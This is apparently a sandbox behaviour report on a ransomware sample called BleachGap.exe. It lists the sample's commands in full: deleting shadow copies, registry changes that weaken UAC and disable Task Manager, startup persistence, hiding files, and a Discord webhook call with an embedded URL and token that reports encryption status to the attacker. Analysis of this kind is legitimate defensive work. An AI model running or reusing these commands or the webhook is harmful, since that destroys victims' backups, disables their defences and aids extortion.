Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: String function: 00147F41 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: String function: 00168B40 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: String function: 00160D27 appears 70 times

Source: BleachGap.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BleachGap.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aescrypt.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BleachGap.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BleachGap.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aescrypt.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: BleachGap.exe, 00000000.00000002.549816565.0000000002570000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs BleachGap.exe
Source: BleachGap.exe, 00000000.00000002.549816565.0000000002570000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs BleachGap.exe
Source: BleachGap.exe, 00000000.00000002.549879279.00000000026A0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs BleachGap.exe
Source: BleachGap.exe, 00000011.00000002.426441176.0000000002710000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs BleachGap.exe
Source: BleachGap.exe, 00000011.00000002.426441176.0000000002710000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs BleachGap.exe
Source: BleachGap.exe, 00000011.00000002.426780571.0000000002DB0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs BleachGap.exe
Source: BleachGap.exe	Binary or memory string: OriginalFilenameNewRealisticSoftware: vs BleachGap.exe

Source: BleachGap.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f

Source: BleachGap.exe	Static PE information: Section: .rsrc ZLIB complexity 0.992906735884
Source: extd.exe.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.99631457115
Source: BleachGap.exe.1.dr	Static PE information: Section: .rsrc ZLIB complexity 0.992906735884
Source: extd.exe.17.dr	Static PE information: Section: UPX1 ZLIB complexity 0.99631457115

Source: classification engine

Classification label: mal100.rans.adwa.evad.winEXE@812/25@8/1

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001AA2D5 GetLastError,FormatMessageW,

34_2_001AA2D5

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00198713 AdjustTokenPrivileges,CloseHandle,		34_2_00198713
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00198CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		34_2_00198CC3

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001AB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

34_2_001AB59E

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001BF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

34_2_001BF121

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_0019DA5D CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,

34_2_0019DA5D

Source: C:\Users\user\Desktop\BleachGap.exe

Code function: 0_2_004026B8 LoadResource,SizeofResource,FreeResource,

0_2_004026B8

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_01

Source: C:\Users\user\Desktop\BleachGap.exe

File created: C:\Users\user\AppData\Local\Temp\1C7E.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\Desktop\BleachGap.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BleachGap.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: BleachGap.exe

Virustotal: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\BleachGap.exe 'C:\Users\user\Desktop\BleachGap.exe'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknown	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Control Panel\Mouse' /v SwapMouseButtons /t REG_SZ /d '1' /f
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +r +s +h +a +i C:\Users\user\Desktop\BleachGap.exe
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe''
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknown	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +r +s +h +a +i 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start -verb runas cmd.exe /ArgumentList '/c kill.bat' /filepath 'C:\Users\user\AppData\Local\Temp' /WindowStyle hidden
Source: C:\Users\user\Desktop\BleachGap.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Control Panel\Mouse' /v SwapMouseButtons /t REG_SZ /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +s +h +a +i 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start -verb runas cmd.exe /ArgumentList '/c kill.bat' /filepath 'C:\Users\user\AppData\Local\Temp' /WindowStyle hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start -verb runas cmd.exe /ArgumentList '/c kill.bat' /filepath 'C:\Users\user\AppData\Local\Temp' /WindowStyle hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
